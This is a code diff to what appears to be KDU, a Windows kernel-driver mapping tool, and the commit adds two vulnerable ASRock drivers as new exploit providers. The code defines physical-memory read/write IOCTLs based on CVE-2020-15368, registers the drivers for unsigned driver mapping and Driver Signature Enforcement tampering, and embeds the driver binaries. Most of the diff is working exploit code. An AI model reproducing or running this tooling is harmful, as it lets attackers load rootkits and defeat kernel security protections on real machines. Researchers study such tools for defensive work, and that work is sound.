v 1.4.1

Added fresh ASRock wormhole drivers as providers 50 and 51

README.md

@@ -159,6 +159,8 @@ Note: Provider with Id 0 assumed as default if no -prv command is specified.
 | 47     | EVGA  | EleetX1| EVGA ELEET X1     | 1.0.16.0 and below              |                      |
 | 48     | ASRock         | AxtuDrv  | AsRock Extreme Tuner     | Undefined              |                      |
 | 49     | ASRock         | AppShopDrv103  | ASRock APP Shop    | 1.0.58 and below       |                      |
+| 50     | ASRock         | AsrDrv107n  | ASRock Motherboard Utility    | 3.0.498 and below       |                      |
+| 51     | ASRock         | AsrDrv107  | ASRock Motherboard Utility    | 3.0.498 and below       |                      |
 
 MSFT blacklist types:
 * Cert - by certificate used to sign the driver which makes it possible to ban huge number of files at one time.
@@ -218,6 +220,8 @@ MSFT blacklist types:
 |47|Original||**File(SHA1):** DA66B66DCA5EA8689DB903EC23E98F2C881DE6F8<br>**Authenticode(SHA1):** A8D16FED8999033126D60C656A3BA359DFAA559F<br>**Page(SHA1):** 082FBFF03465F78276D5A2066398A9D3C73DB9AB<br>**Page(SHA256):** F677A9447400EAEE6E12A88F59AAADCF6DDF8F16EC8F7612BF50AB378A9B9012|
 |48|RWEverything||**File(SHA1):** 3F6A997B04D2299BA0E9F505803E8D60D0755F44<br>**Authenticode(SHA1):** E7FAC017B371A43276E03BF5F71D437E8D377930<br>**Page(SHA1):** EE9A5A98C257F2D50030B7F3AB6D7DA805FCC150<br>**Page(SHA256):** D159D969E05C83F27F446BCC5F171A0043CC3DF0B518962CEE7ACBE30BCC02F8|
 |49|RWEverything||**File(SHA1):** 6074C2360F5DC74738873A525DFBD67EB6625986<br>**Authenticode(SHA1):** 03C523F31603C460076AD549F985DD9533734E95<br>**Page(SHA1):** 85B6FC43E943C9EB9B3DE1FF82A56870620CC1CF<br>**Page(SHA256):** A3AF7747FAC60B814FA6717B174F1199B9D163081B55AE40CEDD9983B6D033F5|
+|50|RWEverything||**File(SHA1):** 11D7E0D29AB17292FD43BDD5CCB7DA0403E50E52<br>**Authenticode(SHA1):** CA06D9FD91F7B681204B35975D5C069D0DABE276<br>**Page(SHA1):** B7693E1170B01F24A824892607C2258CA653805A<br>**Page(SHA256):** B8776F6889CF3D8252F0912DD9745F8EFF4513292DF2B2B1D484CDBC68FBAE4C|
+|51|RWEverything||**File(SHA1):** B1FAD5DA173C6A603FFFE20E0CB5F0BDCA823BD5<br>**Authenticode(SHA1):** 268073AD0B17E2161C1A2A6C5B1BDEBB7B3011B4<br>**Page(SHA1):** 0B48F35DAF8B8BC9BA4E413EF222415EAB791AE0<br>**Page(SHA256):** B073907634013A8EB65E4C8AA42535BAD08101E58B7B1489AEE395B7BE9C69E2|
 
 ###### *At commit time, data maybe inaccurate.
 

Source/Hamakaze/KDU.vcxproj.user

@@ -5,7 +5,7 @@
     <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <LocalDebuggerCommandArguments>-prv 49 -map c:\install\dummy.sys</LocalDebuggerCommandArguments>
+    <LocalDebuggerCommandArguments>-prv 48 -map c:\install\dummy.sys</LocalDebuggerCommandArguments>
     <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
   </PropertyGroup>
 </Project>

Source/Hamakaze/idrv/asrdrv.cpp

@@ -27,6 +27,9 @@
 #define ASROCK_AES_KEY          "C110DD4FE9434147B92A5A1E3FDBF29A"
 #define ASROCK_AES_KEY_LENGTH   sizeof(ASROCK_AES_KEY) - sizeof(CHAR)
 
+ULONG g_AsrReadPhysIOCTL;
+ULONG g_AsrWritePhysIOCTL;
+
 /*
 * AsrEncryptDriverRequest
 *
@@ -268,6 +271,9 @@ BOOL WINAPI AsrWritePhysicalMemory(
         &args);
 }
 
+
+
+
 /*
 * RweReadPhysicalMemory
 *
@@ -301,7 +307,7 @@ BOOL WINAPI RweReadPhysicalMemory(
         request.Granularity = AsrGranularityDword;
 
         if (supCallDriver(DeviceHandle,
-            IOCTL_RWDRV_READ_MEMORY,
+            g_AsrReadPhysIOCTL,
             &request,
             sizeof(request),
             &request,
@@ -339,9 +345,39 @@ BOOL WINAPI RweWritePhysicalMemory(
     request.Data = (PBYTE)Buffer;
 
     return supCallDriver(DeviceHandle,
-        IOCTL_RWDRV_WRITE_MEMORY,
+        g_AsrWritePhysIOCTL,
         &request,
         sizeof(request),
         &request,
         sizeof(request));
 }
+
+/*
+* AsrRegisterDriver
+*
+* Purpose:
+*
+* Register AsRock driver.
+*
+*/
+BOOL WINAPI AsrRegisterDriver(
+    _In_ HANDLE DeviceHandle,
+    _In_opt_ PVOID Param)
+{
+    ULONG DriverId = PtrToUlong(Param);
+
+    UNREFERENCED_PARAMETER(DeviceHandle);
+
+    g_AsrReadPhysIOCTL = IOCTL_RWDRV_READ_MEMORY;
+    g_AsrWritePhysIOCTL = IOCTL_RWDRV_WRITE_MEMORY;
+
+    switch (DriverId) {
+
+    case IDR_ASROCKDRV3:
+        g_AsrReadPhysIOCTL = IOCTL_RWDRV_READ_MEMORY_7N;
+        g_AsrWritePhysIOCTL = IOCTL_RWDRV_WRITE_MEMORY_7N;
+        break;
+    }
+
+    return TRUE;
+}

Source/Hamakaze/idrv/asrdrv.h

@@ -6,7 +6,7 @@
 *
 *  VERSION:     1.41
 *
-*  DATE:        10 Dec 2023
+*  DATE:        11 Dec 2023
 *
 *  ASRock driver interface header.
 *
@@ -38,6 +38,13 @@
 #define IOCTL_RWDRV_WRITE_MEMORY \
 	CTL_CODE(FILE_DEVICE_UNKNOWN, ASRDRV_WRITE_MEMORY, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x0022280C
 
+#define IOCTL_RWDRV_READ_MEMORY_7N  \
+	CTL_CODE(FILE_DEVICE_UNKNOWN, ASRDRV_READ_MEMORY, METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS) //0x0022E808
+
+#define IOCTL_RWDRV_WRITE_MEMORY_7N \
+	CTL_CODE(FILE_DEVICE_UNKNOWN, ASRDRV_WRITE_MEMORY, METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS) //0x0022E80C
+
+
 //
 // Based on CVE-2020-15368
 //
@@ -109,3 +116,7 @@ BOOL WINAPI RweWritePhysicalMemory(
     _In_ ULONG_PTR PhysicalAddress,
     _In_ PVOID Buffer,
     _In_ ULONG NumberOfBytes);
+
+BOOL WINAPI AsrRegisterDriver(
+    _In_ HANDLE DeviceHandle,
+    _In_opt_ PVOID Param);

Source/Hamakaze/kduplist.h

@@ -1339,6 +1339,32 @@ static KDU_PROVIDER g_KDUProviders[] =
         (provOpenProcess)NULL
     },
 
+    {
+        NULL,
+
+        (provStartVulnerableDriver)KDUProvStartVulnerableDriver,
+        (provStopVulnerableDriver)KDUProvStopVulnerableDriver,
+
+        (provRegisterDriver)AsrRegisterDriver,
+        (provUnregisterDriver)NULL,
+        (provPreOpenDriver)NULL,
+        (provPostOpenDriver)KDUProviderPostOpen,
+        (provMapDriver)KDUMapDriver,
+        (provControlDSE)KDUControlDSE2,
+
+        (provReadKernelVM)NULL,
+        (provWriteKernelVM)NULL,
+
+        (provVirtualToPhysical)NULL,
+        (provQueryPML4)NULL,
+        (provReadPhysicalMemory)RweReadPhysicalMemory,
+        (provWritePhysicalMemory)RweWritePhysicalMemory,
+
+        (provValidatePrerequisites)NULL,
+
+        (provOpenProcess)NULL
+    },
+
     {
         NULL,
 
@@ -1355,6 +1381,33 @@ static KDU_PROVIDER g_KDUProviders[] =
         (provReadKernelVM)NULL,
         (provWriteKernelVM)NULL,
 
+        (provVirtualToPhysical)NULL,
+        (provQueryPML4)NULL,
+        (provReadPhysicalMemory)AsrReadPhysicalMemory,
+        (provWritePhysicalMemory)AsrWritePhysicalMemory,
+
+        (provValidatePrerequisites)NULL,
+
+        (provOpenProcess)NULL
+    },
+
+
+    {
+        NULL,
+
+        (provStartVulnerableDriver)KDUProvStartVulnerableDriver,
+        (provStopVulnerableDriver)KDUProvStopVulnerableDriver,
+
+        (provRegisterDriver)AsrRegisterDriver,
+        (provUnregisterDriver)NULL,
+        (provPreOpenDriver)NULL,
+        (provPostOpenDriver)KDUProviderPostOpen,
+        (provMapDriver)KDUMapDriver,
+        (provControlDSE)KDUControlDSE2,
+
+        (provReadKernelVM)NULL,
+        (provWriteKernelVM)NULL,
+
         (provVirtualToPhysical)NULL,
         (provQueryPML4)NULL,
         (provReadPhysicalMemory)RweReadPhysicalMemory,
@@ -1365,6 +1418,7 @@ static KDU_PROVIDER g_KDUProviders[] =
         (provOpenProcess)NULL
     },
 
+
     {
         NULL,
 

Source/Hamakaze/tests.cpp

@@ -188,7 +188,7 @@ VOID KDUTest()
    // KDUTestLoad();
 
    // TestSymbols();
-    Context = KDUProviderCreate(48, 
+    Context = KDUProviderCreate(50, 
         FALSE, 
         NT_WIN10_20H1, 
         KDU_SHELLCODE_V1, 

Source/Tanikaze/Tanikaze.vcxproj

@@ -192,6 +192,8 @@
     <None Include="drv\asio2.bin" />
     <None Include="drv\AsIO3.bin" />
     <None Include="drv\AsrDrv106.bin" />
+    <None Include="drv\AsrDrv107.bin" />
+    <None Include="drv\AsrDrv107n.bin" />
     <None Include="drv\ATSZIO64.bin" />
     <None Include="drv\AxtuDrv.bin" />
     <None Include="drv\dbk64.bin" />

Source/Tanikaze/Tanikaze.vcxproj.filters

@@ -211,6 +211,12 @@
     <None Include="drv\AppShopDrv103.bin">
       <Filter>Resource Files</Filter>
     </None>
+    <None Include="drv\AsrDrv107n.bin">
+      <Filter>Resource Files</Filter>
+    </None>
+    <None Include="drv\AsrDrv107.bin">
+      <Filter>Resource Files</Filter>
+    </None>
   </ItemGroup>
   <ItemGroup>
     <ClCompile Include="main.cpp">

Source/Tanikaze/data/KMUSIG.bin

@@ -1,2 +1,2 @@
-���7��j��z��,]�qq�>Vf[��&S�>��o��ְ��kFzQ���y,�-ҷ}e�I8��q^g�0��^���r*�(��a�7p}�?�4FjB\0K$1g^퉄���b���V`ʹ��%뇱�7�*��֯>��wi
�
+���7���RM��z��,]�qq�>Vf[��&S�>��o��ְ��kFzQ���y,�-ҷ}e�I8��q^g�0��^���r*�(��a�7p}�?�4FjB\0K$1g^퉄���b���V`ʹ��%뇱�7�*��֯>��wi
�
 mV?�SH��/�0�8��H�]��

Source/Tanikaze/resource.h

@@ -51,6 +51,9 @@
 #define IDR_EVGA_ELEETX1                149
 #define IDR_ASROCKDRV2                  150
 #define IDR_ASROCKAPPSHOP103            151
+#define IDR_ASROCKDRV3                  152
+#define IDR_RCDATA1                     153
+#define IDR_ASROCKDRV4                  153
 #define IDR_DATA_DBUTILCAT              1000
 #define IDR_DATA_DBUTILINF              1001
 #define IDR_DATA_KMUEXE                 1002
@@ -63,7 +66,7 @@
 // 
 #ifdef APSTUDIO_INVOKED
 #ifndef APSTUDIO_READONLY_SYMBOLS
-#define _APS_NEXT_RESOURCE_VALUE        152
+#define _APS_NEXT_RESOURCE_VALUE        154
 #define _APS_NEXT_COMMAND_VALUE         40001
 #define _APS_NEXT_CONTROL_VALUE         1007
 #define _APS_NEXT_SYMED_VALUE           101

Source/Tanikaze/resource.rc

@@ -162,6 +162,10 @@ IDR_ASROCKDRV2          RCDATA                  "drv\\AxtuDrv.bin"
 
 IDR_ASROCKAPPSHOP103    RCDATA                  "drv\\AppShopDrv103.bin"
 
+IDR_ASROCKDRV3          RCDATA                  "drv\\AsrDrv107n.bin"
+
+IDR_ASROCKDRV4          RCDATA                  "drv\\AsrDrv107.bin"
+
 
 /////////////////////////////////////////////////////////////////////////////
 //

Source/Tanikaze/tanikaze.h

@@ -773,6 +773,36 @@ KDU_DB_ENTRY gProvEntry[] = {
         (LPWSTR)L"AppShopDrv103",
         (LPWSTR)L"AppShopDrv103",
         (LPWSTR)L"ASROCK Incorporation"
+     },
+
+     {
+        KDU_MIN_NTBUILDNUMBER,
+        KDU_MAX_NTBUILDNUMBER,
+        IDR_ASROCKDRV3,
+        KDU_PROVIDER_ASROCK4,
+        KDU_VICTIM_DEFAULT,
+        SourceBaseRWEverything,
+        KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PHYSICAL_BRUTE_FORCE,
+        KDUPROV_SC_ALL_DEFAULT,
+        (LPWSTR)L"ASRock IO Driver",
+        (LPWSTR)L"AsrDrv107n",
+        (LPWSTR)L"AsrDrv107n",
+        (LPWSTR)L"ASROCK INC."
+     },
+
+     {
+        KDU_MIN_NTBUILDNUMBER,
+        KDU_MAX_NTBUILDNUMBER,
+        IDR_ASROCKDRV4,
+        KDU_PROVIDER_ASROCK5,
+        KDU_VICTIM_DEFAULT,
+        SourceBaseRWEverything,
+        KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PHYSICAL_BRUTE_FORCE,
+        KDUPROV_SC_ALL_DEFAULT,
+        (LPWSTR)L"ASRock IO Driver",
+        (LPWSTR)L"AsrDrv107",
+        (LPWSTR)L"AsrDrv107",
+        (LPWSTR)L"ASROCK INC."
      }
 
 };